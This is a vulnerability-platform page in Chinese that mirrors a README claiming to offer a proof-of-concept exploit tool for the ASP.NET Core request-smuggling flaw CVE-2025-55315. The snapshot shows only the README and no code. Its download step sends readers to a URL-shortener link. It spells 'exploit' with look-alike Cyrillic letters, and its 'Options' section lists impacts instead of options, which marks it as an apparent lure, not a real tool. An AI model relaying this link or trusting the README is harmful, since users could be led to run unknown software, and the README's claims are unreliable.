漏洞平台

POC详情： 0fcf1f201ee1340a0808fcaa4892ba26d0ec6515

来源

https://github.com/digitalsnemesis/CVE-2025-55315

关联漏洞

标题： Microsoft ASP.NET Core 环境问题漏洞 (CVE-2025-55315)
描述：Microsoft ASP.NET Core是美国微软（Microsoft）公司的一框跨平台开源框架。该框架用于构建Web应用、物联网应用和移动后端等基于云的应用程序。 Microsoft ASP.NET Core存在环境问题漏洞，该漏洞源于攻击者利用该漏洞可以绕过某些功能。

介绍

# Security Feature Bypass in ASP.NET Core by Microsoft (CVE-2025-55315)

## 🌟 Description

This vulnerability arises from an inconsistent interpretation of HTTP requests, commonly referred to as HTTP request/response smuggling. An authorized attacker can explоit this inconsistency to circumvent important security features, potentially leading to unauthorized access or manipulation of application data.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|Download PoC [here](https://tinyurl.com/bwhw5u5y)
|:--------------- |

2. Navigate to the tool's directory:

cd CVE-2025-55315

3. Install the required Python packages:

pip install -r requirements.txt

## 🚀 Usage

To use the tool, run the script from the command line as follows:

python explоit.py [options]

### Options

Unauthorized Access: By bypassing security features, attackers could gain access to sensitive data or functionalities within the application, leading to data breaches that could compromise user confidentiality and integrity.

Application Compromise: Explоitation of this vulnerability could facilitate further attacks, allowing malicious actors to perform unauthorized operations, which may result in system instability or additional security breaches.

Reputational Damage: Organizations affected by this vulnerability could suffer significant reputational harm, as customers and stakeholders may lose trust in the security and reliability of their applications, potentially resulting in financial losses and diminished market position.


### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low

## 🗒 Affected Versions

The vulnerability affects the following versions:

Asp.net Core 8.0
Asp.net Core 9.0
Asp.net Core 2.3
Microsoft Visual Studio 2022 Version 17.12
Microsoft Visual Studio 2022 Version 17.10
Microsoft Visual Studio 2022 Version 17.14

## 🛡 Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.

文件快照


 [4.0K]  /data/pocs/0fcf1f201ee1340a0808fcaa4892ba26d0ec6515
└── [2.2K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。